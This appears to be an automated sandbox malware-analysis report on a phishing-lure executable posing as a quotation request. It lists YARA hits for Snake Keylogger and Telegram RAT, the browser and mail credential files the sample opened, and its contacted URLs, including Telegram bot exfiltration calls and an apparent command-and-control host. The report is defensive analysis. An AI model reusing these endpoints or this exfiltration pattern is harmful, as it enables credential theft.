Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	100%	Avira	HEUR/AGEN.1306899
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	100%	Avira	HEUR/AGEN.1306899
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\jnqeRRexnD.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.75	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlBsq	jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000324B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003250000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003241000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	false	high
